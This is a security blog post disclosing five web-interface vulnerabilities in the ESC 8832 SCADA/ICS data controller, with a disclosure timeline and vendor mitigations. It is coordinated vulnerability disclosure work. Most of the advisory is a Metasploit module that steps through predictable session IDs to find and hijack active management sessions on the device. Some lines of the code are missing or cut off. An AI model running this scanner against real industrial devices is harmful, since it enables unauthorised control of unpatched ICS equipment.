th3r3g3nt Security Blog
Root for everyone

New Site

Good evening,

The site has been offline for a while, due to multiple factors - mainly lack of time. Also, my previous hosting service was straight up crap, but that is taken care of. Hopefully I will be able to rebuild to a much simpler site, without WordPress crap and such. (Ain't nobody got time for maintaining / securing that junk...) So back to HTML and hand editing, so there will be a lot of cosmetic try-n-error but hopefully who cares, because the content will not be affected. Help is always appreciated, reach out if you are bored and have time on your hand to donate.

ESC 8832 Data Controller multiple vulnerabilities (web interface)

Good evening,

This article will disclose the details of discovered vulnerability of the ESC 8832 Data Controller. This devices is often found on SCADA / ICS networks, as it’s function is data acquisition, processing and alarm generation about ambient data. More precisely (from the manual by the manufacturer), “The ESC Model 8832 Data System Controller is a microprocessor-based data acquisition system designed to acquire, process, store, report, and telemeter data in a multi-tasking environment. Basically it processes information from industrial sensors and does magic with the data, spitting back useful info.
The vendor “Environmental Systems Corporation (ESC)” was very receptive and responsive to the vulnerabilities and we coordinated the responsible disclosure details. According to ESC the product is no longer supported and cannot be upgraded via firmware upgrade. “Unfortunately, the 8832 Data Controller is now completely out of code space, and ESC has no technical ability to make any additional changes to the firmware.” (ESC) Particularly the web interface of the device was found vulnerable. The native client, installed on end-points where not tested.
The vendor recommendation for mitigation is to upgrade to the latest supported model. (Not tested by me) Alternatively, block port 80 with a firewall in front of the device. As a another alternative, educate operators and users to do not use the web interface for device management, as there are other means to manage the device. (Not tested by me)

[0] Summary & Timeline:

[1] Session Hijacking
[2] Predictable user session generation
[3] Unencrypted protocol
[4] Lack of user names
[5] Session token in HTTP GET

02/18/2015 – Vulnerability discovered
02/18/2015 – First contact with vendor
02/19/2015 – Response from vendor
02/20/2015 – Details submitted to vendor
02/23/2015 – Vendor verified all 5 issues, mutually agreed on 90 day full disclosure timeline
02/27/2015 – Vendor notified clients through email and support portal
05/28/2015 – Vendor was contacted with disclosure details and verbiage
05/29/2015 – Details, MSF module, POC was published on researcher’s web site. Submitted to

Metasploit module goes like this (esc_8832_session.rb):

# This module requires Metasploit:
# Current source:

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info={})
      'Name'        => 'ESC 8832 Data Controller Session Hijack Scanner',
      'Description' => %q{ This module detects if an active session is present and hijackable on the target ESC 8832 web interface.},
      'Author'      => ['Balazs Makany'],
      'References'  =>
        ['URL', ''],
      'License'     => MSF_LICENSE

        Opt::RPORT(80),'STOP_ON_SUCCESS', [true, "Stop when a live session was found", true]),

  def run_host(target_host)
        result = []
                ('1'.. '15').each do |u|
                print_status("Scanning #{target_host} - with Session ID '#{u}'")

                #Just to be on the safe side here.

                res = send_request_raw({
                'uri'     => '/escmenu.esp?sessionid='+u+'&menuid=6',
                'method'  => 'GET',
                'headers' => { 'Connection' => 'Close' }
                }, 25)

                if (res and res.code == 200 and res.body)
                    if res.body.match(/(Configuration\sMenu)/im)
                        print_good("#{target_host} - Active Session found as #{u}!")
                        print_good("Complete request: http://#{target_host}/escmenu.esp?sessionid=#{u}&menuid=6")
                            :host  => target_host,
                            :port  => datastore['RPORT'],
                            :name  => "ESC 8832 Web Vulnerability",
                            :info  => "Module #{self.fullname} confirmed a valid session (#{u}) on the ESC 8832 Web Interface",
                        break if datastore['STOP_ON_SUCCESS']
                    if res.body.match(/(Access\sDenied!)/im)
                        print_status("  Dead session")

        rescue ::Interrupt
                raise $!
        rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
                print_error("Timeout or no connection on #{rhost}:#{rport}")
        rescue ::Exception => e
                print_error("#{rhost}:#{rport} Error: #{e.class} #{e} #{e.backtrace}")


Update: 2015-05-29

ESC 8832 Network Security Advisory – February 27, 2015

Good evening,